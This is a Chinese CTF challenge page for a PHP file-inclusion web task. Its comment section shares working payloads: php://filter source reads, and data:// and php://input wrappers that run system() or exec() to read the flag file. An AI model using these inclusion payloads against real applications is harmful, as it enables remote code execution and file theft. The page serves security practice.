简单的IncludeWEB 未解决
分数:
15
金币:
2
题目作者:
hanzkj
一 血:
flagOrz
一血奖励:
2金币
解 决:
291
提 示:
描 述:
听说你很会读文件?我把门(目录遍历)焊死了,窗户(关键词过滤)也封了。笔给你,你来写(payload)。
评分(0)
暂无评分
解题动态
czd1 攻破了该题 1天前
tytu 攻破了该题 4天前
minshenyao 攻破了该题 7天前
Cipher07 攻破了该题 7天前
TrySec 攻破了该题 17天前
wbq012 攻破了该题 17天前
蓝色 攻破了该题 17天前
box 攻破了该题 17天前
ctf菜鸟 攻破了该题 19天前
掘金 攻破了该题 19天前
15186789599 攻破了该题 19天前
dlgz 攻破了该题 20天前
Sukuraaya 攻破了该题 20天前
19353442260 攻破了该题 22天前
TKar0 攻破了该题 23天前
ycm824632241 攻破了该题 24天前
ndzdb 攻破了该题 24天前
fubao2020 攻破了该题 27天前
acrock 攻破了该题 28天前
评论
kitniu 1月前
举报
1.IP/?page=php://filter/read=convert.base64-encode/resource=index.php 2.IP/?page=data://text/plain,%3C?php%20system(%27cat%20/fla?%27)?%3E
网恋秀牛子被录屏导致自卑 5月前
举报
/?page=data://text/plain,<?=exec("cat /fla?")?>
shrinp 5月前
举报
php://filter/convert.base64-encode/resource获取源码-》查看WAF细节-》使用data://text/plain, <?php 你需要的命令?>即可
yinghui130 6月前
举报
POST /?page=php://input HTTP/1.1 &lt;br&gt; Host: 171.80.2.169:15133 &lt;br&gt; &lt;br&gt; &lt;?php system('tac /flag ');?&gt;
网恋秀牛子被录屏导致自卑 5月前
举报
@111222 这不是实体编码,是bugku不让发尖括号之类的符号,自动把评论替换成实体编码了
111222 5月前
举报
谢谢你的思路,不过我用burp试了一下这里不用实体编码似乎也可以过
Jazz888 6月前
举报
flag{**********}
wywitkey 6月前
举报
解题思路是伪协议,先期php://filter/读源码,后期data://text/plain,读flag